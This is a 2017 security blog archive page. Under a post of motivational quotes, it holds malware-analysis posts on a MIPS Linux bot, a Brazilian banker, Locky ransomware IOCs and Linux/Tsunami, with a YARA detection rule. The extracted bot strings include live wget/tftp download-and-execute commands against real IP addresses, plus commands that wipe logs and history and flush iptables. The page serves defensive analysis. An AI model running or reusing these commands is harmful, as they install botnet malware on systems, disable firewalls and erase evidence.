Hard work never fails!: September 2017

Saturday, September 23, 2017

Quotes from Successful People

Albert Einstein

Imagination is more important than knowledge.
Insanity: doing the same thing over and over again and expecting different results.
No problem can be solved from the same level of consciousness that created it.
The important thing is not to stop questioning. Curiosity has its own reason for existing.
Life is like riding a bicycle. To keep your balance you must keep moving.
Two things are infinite: the universe and human stupidity; and I'm not sure about the universe.
Look deep into nature, and then you will understand everything better.
Try not to become a man of success, but rather try to become a man of value.
I have no special talents. I am only passionately curious.
Everything should be made as simple as possible, but not simpler.

Bill Gates

Life is not fair, get used to it (quite honest)
Success is a lousy teacher. It seduces smart people into thinking they can't lose.
If you can't make it good, at least make it look good.
I believe that if you show people the problems and you show them the solutions they will be moved to act.

Steve Jobs

Your time is limited, so don’t waste it living someone else’s life.
I want to put a ding in the universe.
We hire people who want to make the best things in the world.
Sometimes life is going to hit you in the head with a brick. Don't lose faith.
Being the richest man in the cemetery doesn't matter to me. Going to bed at night saying we've done something wonderful, that's what matters to me.
Sometimes when you innovate, you make mistakes. It is best to admit them quickly, and get on with improving your other innovations.
Design is not just what it looks like and feels like. Design is how it works.
Innovation distinguishes between a leader and a follower.

Mark ZuckerBerg

Done is better than perfect.
I think a simple rule of business is, if you do the things that are easier first, then you can actually make a lot of progress.

Jack Ma

See beyond your circumstances. No matter what your current condition, how or where you grew up, or what education or training you feel you lack, you can be successful in your chosen endeavour.

Henry Ford

Failure is the only opportunity to begin again more intelligently.
If you think you can do a thing or think you can't do a thing, you're right.
A business that makes nothing but money is a poor business.
Don't find fault, find a remedy.

Michael Jordan

Accept failure, but keep trying.

Walt Disney

Keep moving forward.

Muhammad Ali

I hated every minute of training, but I said, 'Don't quit. Suffer now and live the rest of your life as a champion.'
Don't count the days, make the days count.
He who is not courageous enough to take risks will accomplish nothing in life.
I am the greatest, I said that even before I knew I was.
If you even dream of beating me you'd better wake up and apologize.
I'm so fast that last night I turned off the light switch in my hotel room and was in bed before the room was dark.
The fight is won or lost far away from witnesses - behind the lines, in the gym, and out there on the road, long before I dance under those lights.

And success tips from Arnold Schwarzenegger

Post created for inspiring billions
by
newWorld

Saturday, September 9, 2017

Analysis of recent linux malware:

Today we received a linux malware sample for analysis.
MD5: 26413FD652A4ABB3FCA4A936DE6A4736

remnux@remnux:~/Downloads$ file ntpd
ntpd: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, not stripped

This sample appears to be attacking bot. Let's look at the strings:

00000001D6A0 00000001D6A0 0 37.158.%d.%d
00000001D6B0 00000001D6B0 0 95.9.%d.%d
00000001D6BC 00000001D6BC 0 41.252.%d.%d
00000001D6CC 00000001D6CC 0 58.71.%d.%d
00000001D6D8 00000001D6D8 0 104.55.%d.%d
00000001D6E8 00000001D6E8 0 78.186.%d.%d
00000001D6F8 00000001D6F8 0 78.189.%d.%d
00000001D708 00000001D708 0 221.120.%d.%d
00000001D718 00000001D718 0 88.5.%d.%d
00000001D724 00000001D724 0 41.254.%d.%d
00000001D734 00000001D734 0 103.20.%d.%d
00000001D744 00000001D744 0 103.47.%d.%d
00000001D754 00000001D754 0 103.57.%d.%d
00000001D764 00000001D764 0 45.117.%d.%d
00000001D774 00000001D774 0 101.51.%d.%d
00000001D784 00000001D784 0 137.59.%d.%d
00000001D794 00000001D794 0 1.56.%d.%d
00000001D7A0 00000001D7A0 0 1.188.%d.%d
00000001D7AC 00000001D7AC 0 14.204.%d.%d
00000001D7BC 00000001D7BC 0 27.0.%d.%d
00000001D7C8 00000001D7C8 0 27.8.%d.%d
00000001D7D4 00000001D7D4 0 27.50.%d.%d
00000001D7E0 00000001D7E0 0 27.54.%d.%d
00000001D7EC 00000001D7EC 0 27.98.%d.%d
00000001D7F8 00000001D7F8 0 27.112.%d.%d
00000001D808 00000001D808 0 27.192.%d.%d
00000001D818 00000001D818 0 36.32.%d.%d
00000001D824 00000001D824 0 36.248.%d.%d
00000001D834 00000001D834 0 39.64.%d.%d
00000001D840 00000001D840 0 42.4.%d.%d
00000001D84C 00000001D84C 0 42.48.%d.%d
00000001D858 00000001D858 0 42.52.%d.%d
00000001D864 00000001D864 0 42.56.%d.%d
00000001D870 00000001D870 0 42.63.%d.%d
00000001D87C 00000001D87C 0 42.84.%d.%d
00000001D888 00000001D888 0 42.176.%d.%d

Other interesting strings:

00000001E289 00000001E289 0 [0;31mSuccessfully Bruteforced IP:

00000001E2AD 00000001E2AD 0 [0;33m%s |

00000001E2B9 00000001E2B9 0 [0;31mUsername:

00000001E2CA 00000001E2CA 0 [0;33m%s |

00000001E2D6 00000001E2D6 0 [0;31mPassword:

00000001E2E7 00000001E2E7 0 [0;33m%s

00000001E2F4 00000001E2F4 0 REPORT %s:%s:%s

00000001E324 00000001E324 0 %s cd /var/; rm -rf tftp; wget http://89.38.96.67/tftp || tftp -r tftp -g 89.38.96.67; chmod 777 tftp; ./tftp; rm -rf tftp

00000001E3A8 00000001E3A8 0 cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://94.177.172.221/John.sh ; chmod 777 John.sh; sh John.sh; tftp 94.177.172.221 -c get tftp11.sh; chmod 777 tftp11.sh; sh tftp11.sh; tftp -r tftp22.sh -g 94.177.172.221; chmod 777 tftp22.sh; sh tftp22.sh; ftpget -v -u anonymous -p anonymous -P 21 94.177.172.221 ftp11.sh ftp11.sh; sh ftp11.sh; rm -rf John.sh tftp11.sh tftp22.sh ftp11.sh;rm -rf *;history -c

00000001E550 00000001E550 0 jackmy*

00000001E558 00000001E558 0 busybox*

00000001E574 00000001E574 0 tftp*

00000001E584 00000001E584 0 mipsel*

00000001E58C 00000001E58C 0 mips*

00000001E594 00000001E594 0 mips64*

00000001E59C 00000001E59C 0 i686*

00000001E5A4 00000001E5A4 0 sparc*

00000001E5BC 00000001E5BC 0 jackmeoff*

00000001E5C8 00000001E5C8 0 hackz*

00000001E5D0 00000001E5D0 0 bruv*

00000001E5E0 00000001E5E0 0 armv*

00000001E5E8 00000001E5E8 0 ntpd*

00000001E5F0 00000001E5F0 0 shitty*

00000001E5F8 00000001E5F8 0 jack*

00000001E618 00000001E618 0 mipsel

00000001E63C 00000001E63C 0 /dev/netslink/

00000001E64C 00000001E64C 0 /tmp/

00000001E654 00000001E654 0 /var/

00000001E65C 00000001E65C 0 /dev/

00000001E664 00000001E664 0 /var/run/

00000001E670 00000001E670 0 /dev/shm/

00000001E67C 00000001E67C 0 /mnt/

00000001E684 00000001E684 0 /boot/

00000001E68C 00000001E68C 0 /usr/

00000001E694 00000001E694 0 >%s.t && cd %s && for a in

00000001E6B0 00000001E6B0 0 ls -a %s

00000001E6B9 00000001E6B9 0 ; do >$a; done; >retrieve ;echo ps aux >> proc ; pkill -9 %d

00000001E6F8 00000001E6F8 0 >%s.t && cd %s ; >retrieve

00000001E718 00000001E718 0 pkill -9 %s

00000001E728 00000001E728 0 rm -rf /tmp/* /var/* /var/run/* /var/tmp/*

00000001E754 00000001E754 0 rm -rf /var/log/wtmp

00000001E76C 00000001E76C 0 history -c;history -w

00000001E784 00000001E784 0 rm -rf /tmp/*

00000001E794 00000001E794 0 history -c

00000001E7A0 00000001E7A0 0 rm -rf ~/.bash_history

00000001E7B8 00000001E7B8 0 rm -rf /bin/netstat

00000001E7CC 00000001E7CC 0 history -w

00000001E7D8 00000001E7D8 0 pkill -9 busybox

00000001E7EC 00000001E7EC 0 pkill -9 perl

00000001E7FC 00000001E7FC 0 service iptables stop

00000001E814 00000001E814 0 /sbin/iptables -F;/sbin/iptables -X

00000001E838 00000001E838 0 close

00000001E840 00000001E840 0 keep-alive

00000001E84C 00000001E84C 0 accept

00000001E854 00000001E854 0 Mozilla/5.0 (compatible; Konqueror/3.0; i686 Linux; 20021117)

00000001E894 00000001E894 0 Mozilla/5.0 (Windows NT 6.1; WOW64) SkypeUriPreview Preview/0.5

00000001E8D4 00000001E8D4 0 Mozilla/5.0 (iPhone; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10

00000001E964 00000001E964 0 Mozilla/5.0 Galeon/1.0.3 (X11; Linux i686; U;) Gecko/0

00000001E99C 00000001E99C 0 Opera/6.04 (Windows XP; U) [en]

00000001E9BC 00000001E9BC 0 Opera/9.99 (X11; U; sk)

00000001E9D4 00000001E9D4 0 Mozilla/6.0 (Future Star Technologies Corp. Star-Blade OS; U; en-US) iNet Browser 2.5

00000001EA2C 00000001EA2C 0 Mozilla/5.0(iPad; U; CPU iPhone OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B314 Safari/531.21.10gin_lib.cc

00000001EACC 00000001EACC 0 Mozilla/5.0 Galeon/1.2.9 (X11; Linux i686; U;) Gecko/20021213 Debian/1.2.9-0.bunk

00000001EB20 00000001EB20 0 Mozilla/5.0 Slackware/13.37 (X11; U; Linux x86_64; en-US) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41

00000001EB94 00000001EB94 0 Mozilla/5.0 (compatible; iCab 3.0.3; Macintosh; U; PPC Mac OS)

00000001EBD4 00000001EBD4 0 Opera/9.80 (J2ME/MIDP; Opera Mini/5.0 (Windows; U; Windows NT 5.1; en) AppleWebKit/886; U; en) Presto/2.4.15Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0

00000001EC8C 00000001EC8C 0 Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.9a8) Gecko/2007100620 GranParadiso/3.1

00000001ECE0 00000001ECE0 0 Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)

00000001ED38 00000001ED38 0 Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en; rv:1.8.1.11) Gecko/20071128 Camino/1.5.4

00000001ED90 00000001ED90 0 Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201

00000001EDD0 00000001EDD0 0 Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.6) Gecko/2009020911

00000001EE18 00000001EE18 0 Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.6) Gecko/20100628 myibrow/4alpha2

00000001EE70 00000001EE70 0 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; MyIE2; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0)

00000001EEDC 00000001EEDC 0 Mozilla/5.0 (Windows; U; Win 9x 4.90; SG; rv:1.9.2.4) Gecko/20101104 Netscape/9.1.0285

00000001EF34 00000001EF34 0 Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko/20090327 Galeon/2.0.7

00000001EF84 00000001EF84 0 Mozilla/5.0 (PLAYSTATION 3; 3.55)

00000001EFA8 00000001EFA8 0 Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Thunderbird/38.2.0 Lightning/4.0.2

00000001F004 00000001F004 0 wii libnup/1.0

00000001F014 00000001F014 0 Mozilla/4.0 (PSP (PlayStation Portable); 2.00)

00000001F044 00000001F044 0 PSP (PlayStation Portable); 2.00

00000001F068 00000001F068 0 Bunjalloo/0.7.6(Nintendo DS;U;en)

00000001F08C 00000001F08C 0 Doris/1.15 [en] (Symbian)

00000001F0A8 00000001F0A8 0 BlackBerry7520/4.0.0 Profile/MIDP-2.0 Configuration/CLDC-1.1

00000001F0E8 00000001F0E8 0 BlackBerry9700/5.0.0.743 Profile/MIDP-2.1 Configuration/CLDC-1.1 VendorID/100findlinks/2.0.1 (+http://wortschatz.uni-leipzig.de/findlinks/)

00000001F174 00000001F174 0 findlinks/1.1.6-beta6 (+http://wortschatz.uni-leipzig.de/findlinks/)

00000001F1BC 00000001F1BC 0 findlinks/1.1.6-beta4 (+http://wortschatz.uni-leipzig.de/findlinks/)

00000001F204 00000001F204 0 findlinks/1.1.6-beta1 (+http://wortschatz.uni-leipzig.de/findlinks/)

00000001F24C 00000001F24C 0 findlinks/1.1.5-beta7 (+http://wortschatz.uni-leipzig.de/findlinks/)

00000001F294 00000001F294 0 Mozilla/5.0 (Windows; U; WinNT; en; rv:1.0.2) Gecko/20030311 Beonex/0.8.2-stable

00000001F2E8 00000001F2E8 0 Mozilla/5.0 (Windows; U; WinNT; en; Preview) Gecko/20020603 Beonex/0.8-stable

00000001F338 00000001F338 0 Mozilla/5.0 (X11; U; Linux i686; nl; rv:1.8.1b2) Gecko/20060821 BonEcho/2.0b2 (Debian-1.99+2.0b2+dfsg-1)

00000001F3A4 00000001F3A4 0 Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1b2) Gecko/20060821 BonEcho/2.0b2

00000001F3F8 00000001F3F8 0 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1b2) Gecko/20060826 BonEcho/2.0b2

00000001F454 00000001F454 0 Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.8.1b2) Gecko/20060831 BonEcho/2.0b2

00000001F4B0 00000001F4B0 0 Mozilla/5.0 (X11; U; Linux x86_64; en-GB; rv:1.8.1b1) Gecko/20060601 BonEcho/2.0b1 (Ubuntu-edgy)

00000001F514 00000001F514 0 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1a3) Gecko/20060526 BonEcho/2.0a3

00000001F570 00000001F570 0 Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.1a2) Gecko/20060512 BonEcho/2.0a2

00000001F5CC 00000001F5CC 0 Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1a2) Gecko/20060512 BonEcho/2.0a2

00000001F628 00000001F628 0 Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1a2) Gecko/20060512 BonEcho/2.0a2

00000001F688 00000001F688 0 AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)

00000001F6D0 00000001F6D0 0 AppEngine-Google; (+http://code.google.com/appengine; appid: unblock4myspace)AppEngine-Google; (+http://code.google.com/appengine; appid: tunisproxy)

00000001F768 00000001F768 0 AppEngine-Google; (+http://code.google.com/appengine; appid: proxy-in-rs)

00000001F7B4 00000001F7B4 0 AppEngine-Google; (+http://code.google.com/appengine; appid: proxy-ba-k)

00000001F800 00000001F800 0 AppEngine-Google; (+http://code.google.com/appengine; appid: moelonepyaeshan)

00000001F850 00000001F850 0 AppEngine-Google; (+http://code.google.com/appengine; appid: mirrorrr)

00000001F898 00000001F898 0 AppEngine-Google; (+http://code.google.com/appengine; appid: mapremiereapplication)

00000001F8EC 00000001F8EC 0 AppEngine-Google; (+http://code.google.com/appengine; appid: longbows-hideout)

00000001F93C 00000001F93C 0 AppEngine-Google; (+http://code.google.com/appengine; appid: eduas23)

00000001F984 00000001F984 0 AppEngine-Google; (+http://code.google.com/appengine; appid: craigserver)

00000001F9D0 00000001F9D0 0 AppEngine-Google; ( http://code.google.com/appengine; appid: proxy-ba-k)

00000001FA1C 00000001FA1C 0 magpie-crawler/1.1 (U; Linux amd64; en-GB; +http://www.brandwatch.net)

00000001FA64 00000001FA64 0 Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)

00000001FAB4 00000001FAB4 0 Mozilla/5.0 (compatible; MJ12bot/v1.2.3; http://www.majestic12.co.uk/bot.php?+)

00000001FB04 00000001FB04 0 MJ12bot/v1.0.8 (http://majestic12.co.uk/bot.php?+)

00000001FB38 00000001FB38 0 MJ12bot/v1.0.7 (http://majestic12.co.uk/bot.php?+)

00000001FB6C 00000001FB6C 0 Mozilla/5.0 (compatible; MojeekBot/2.0; http://www.mojeek.com/bot.html)

00000001FBB4 00000001FBB4 0 %s %s HTTP/1.1

00000001FBC4 00000001FBC4 0 Connection: %s

00000001FBD4 00000001FBD4 0 Accept: */*

00000001FBE1 00000001FBE1 0 User-Agent: %s

00000001FBF4 00000001FBF4 0 arfgG

00000001FBFC 00000001FBFC 0 HBiug655

00000001FC08 00000001FC08 0 KJYDFyljf754

00000001FC18 00000001FC18 0 LIKUGilkut769458905

00000001FC2C 00000001FC2C 0 JHFDSkgfc5747694

00000001FC40 00000001FC40 0 GJjyur67458

00000001FC4C 00000001FC4C 0 RYSDk747586

00000001FC58 00000001FC58 0 HKJGi5r8675

00000001FC64 00000001FC64 0 KHGK7985i

00000001FC70 00000001FC70 0 yuituiILYF

00000001FC7C 00000001FC7C 0 GKJDghfcjkgd4

00000001FC8C 00000001FC8C 0 uygtfgtrevf

00000001FC98 00000001FC98 0 tyeuhygbtfvg

00000001FCA8 00000001FCA8 0 ewqdcftr

00000001FCB4 00000001FCB4 0 trbazetghhnbrty

00000001FCC4 00000001FCC4 0 tbhrwsehbg

00000001FCD0 00000001FCD0 0 twehgbferhb

00000001FCDC 00000001FCDC 0 etrbhhgetrb

00000001FCE8 00000001FCE8 0 edfverthbyrtb

00000001FCF8 00000001FCF8 0 kmiujmnhnhfgn

00000001FD08 00000001FD08 0 zcdbvgdfsbgfd

Post made by

newWorld

Analysis of Brazilian Banker malware

Executive summary

Brazilian banker malware is one of the popular banking malware which targets South America and referred by malware researchers as SA-Banker or Brazilian Banker. Many campaigns were used by malware actors to reach the victim and lure them to give their credentials in the application. Once the fake application get the banking credentials which will be acquired by the malware authors. Last week, we got the attention of banking malware which uses campaigns using Facebook’s content delivery network (CDN).

Campaign using FB CDN:

Security researchers worried on the latest campaign using Facebook’s CDN so it makes harder for the security products to block.

Figure 1 CDN used in Brazilian banking malware

The last week data from malware hunter team says that around 200 thousand people opened the email from Brazil. Refer the following image from malware hunter team:

Figure 2 Email Infection stats

Our researchers dig deeper and get the malware samples for analysis. This is purely targeted on Brazil banking customers.

Analysis

File MD5: 76E3E02AD689AF06699205D5BE956894

Size of the file: 752 KB

Figure 3 File submission

This sample was submitted to the system, two days back only and like we said the origin or source of the submission is Brazil. And the file type is dll.

Figure 4 Banker detection

We load the sample to PEid for checking the export details.

Figure 5 Export details of the malware sample

Further analysis will be published in the next post.

Post by

newWorld researchers

Wednesday, September 6, 2017

Locky download links for analysis (Pastebin link)

In our last post, Locky Ransomware Latest Infection - Indicator of Compromise: (http://www.edison-newworld.com/2017/09/locky-ransomware-latest-infection.html) we posted the details of IOC - indicator of compromise of famous Locky ransomware. Security researchers added few more details in the following pastebin link:

https://pastebin.com/8esSAWFD

You can visit and get the links. But we copied those links as image.

Note: This is purely for research purpose and malware analysis purpose - Not for abusing this.

https://www.virustotal.com/en/file/907f65e8a56dbd6328175c924987218d1d5e2eb144222f5fe5d1c52ad2647773/analysis/1504691819/
https://www.virustotal.com/en/file/045d4930f2d37a12d9a3b5725c777cd7b4ecdeffa2f6138809d2a12e42570f9f/analysis/1504691826/
https://www.virustotal.com/en/file/e75e5d374f20c386b1114252647cca7bd407190cafb26c6cfbd42c5f9223fe6c/analysis/1504691837/
https://www.virustotal.com/en/file/3ac9ab7ddd73531c3d5b7438f6bb74a7711c7f523770d61c338da4664993e7b1/analysis/1504691850/
https://www.virustotal.com/en/file/e6ddca65b517362123dfab0961f0735d738b7b3309568d021c533f1b19073666/analysis/150469188

Locky urls

Raw links locky

Post made by
newWorld researchers

Tuesday, September 5, 2017

Locky Ransomware Latest Infection - Indicator of Compromise:

IOC for latest locky ransomware infection:

Locky Infection URL:

hxxp://konferencjaora[.]pl/w/523f.php
hxxp://autonikos[.]pl/w/6dty.php
hxxp://oxfordschoolkotputli[.]com/w/vait.php
hxxp://j3[.]rodolfogn[.]com/w/qn0b.php
hxxp://martinagebhardt[.]hu/w/uol4.php

Regex created for this php file is \/w\/[0-9a-z]{4}\.php.

Fake Dropbox landing page which serve locky ransomware:

Fake Dropbox link in the mail

hxxp://albion-cx22.co[.]uk/dropbox.html
hxxp://ambrogiauto[.]com/dropbox.html
hxxp://arthurdenniswilliams[.]com/dropbox.html
hxxp://autoecoleathena[.]com/dropbox.html
hxxp://autoecoleboisdesroches[.]com/dropbox.html
hxxp://autoecoledufrene[.]com/dropbox.html
hxxp://avtokhim[.]ru/dropbox.html
hxxp://bayimpex[.]be/dropbox.html
hxxp://binarycousins[.]com/dropbox.html
hxxp://charleskeener[.]com/dropbox.html
hxxp://campusvoltaire[.]com/dropbox.html
hxxp://dar-alataa[.]com/dropbox.html
hxxp://flooringforyou.co[.]uk/dropbox.html
hxxp://gestionale-orbit[.]it/dropbox.html
hxxp://griffithphoto[.]com/dropbox.html
hxxp://jakuboweb[.]com/dropbox.html
hxxp://jaysonmorrison[.]com/dropbox.html
hxxp://patrickreeves[.]com/dropbox.html
hxxp://potamitis[.]gr/dropbox.html
hxxp://tasgetiren[.]com/dropbox.html
hxxp://willemshoeck[.]nl/dropbox.html

Fake Dropbox landing page

It is advised to block these malicious url in the firewall, if you find any of these urls in your proxy logs or firewall that it is an indication of your system has been infected.

Post made by
newWorld researchers

Sunday, September 3, 2017

Linux/Tsunami Malware Captured from honeypot

Today we got a shell file which was captured from honeypot and submitted to VT. We checked the detection for that file and flagged as Linux/Tsunami.NJH. We directly look in to the contents of shell script and it is generic downloader as it seem.

Figure 1 Linux/Tsunami.NJH

The script contains same IP address throughout the file: 46.218.149(.)85. We checked this IP address with those file directories in VT and it actually download malicious ELF file. We moved to the detection page and it got similar hits where Eset detects it as a variant of Linux/Tsunami.NCD. The family description for this variant says that it is a backdoor and can be controlled remotely. The main purpose of this malware is to download other malware files from the server, DDoS attack and shell command execution.

Downloaded files - analysis

Based on the details, we manually downloaded the important files and started our analysis. We started with the string analysis of these file to get any idea. All the three files which we downloaded have junk strings. And there is two line of strings which at least look like a Japanese words. Refer the below snapshot:

Figure 2 Strings of all the three files

· 0000000A5069 0000000A5069 nandemo shiranai wa yo,

· 0000000A5084 0000000A5084 shitteru koto dake

String analysis – Based on Google search results

When we read that string it spell like Japanese words, we need to check in google. Yes it is Japanese word and it means “I don’t know anything” and “only I know”. But the plain google search leads to some interesting posts like funtime ninja codes and DDoS router malware.

Figure 3 Funtimes Ninja Malware

TFTP is a protocol for transferring data servers use to boot diskless workstations, X-terminals, and routers by using User Data Protocol (UDP). TFTP was primarily designed to read or write files by using a remote server. Here busybox is found in all the loops. It giving a hint that it could attack on limited resource linux machine (aka linux on embedded systems).

Let’s move on to the next one DDoS router malware article where we found the following yara rule to detect the presence of router DDoS malware:

import “elf”

rule STD

{

meta:

author = “Akamai SIRT”

description = “Kaiten/STD DDoS malware”

strings:

$s0 = “shitteru koto dake”

$s1 = “nandemo wa shiranai wa yo,”

condition:

elf.number_of_sections == 0 and

elf.number_of_segments == 2 and

$s0 and $s1

}

This yara rule was created by researchers from Akamai for Kaiten/STD router DDoS malware.

Figure 4 DDoS Campaign

The above graph is from Akamai on the DDoS campaign from different locations across the globe.

Static analysis of the downloaded files

We ran the file command to check the file properties of these files, and resulted as valid elf file.

Figure 5 File command elf

Figure 6 ELF Header

When we try to disassemble these files we are facing following warnings:

· Warning: read (shdr) at 0xffff

· Warning: Cannot initialize section headers

· Warning: Cannot initialize strings table

Using the initial script, tweaked few lines related to download, now it’s throwing error as exec format error.

Figure 7 Execution error

Conclusion

Based on the AV detection and string analysis, these files are found to be backdoor with DDoS functionalities. It is highly recommended to block the malicious IP address in the firewall and proxy. A good SOC with better threat intelligence feed will minimise the attack and even stop the attack before it creates any damage.

Research done by

newWorld security researchers

Hard work never fails!

Search here, what you like to know!!!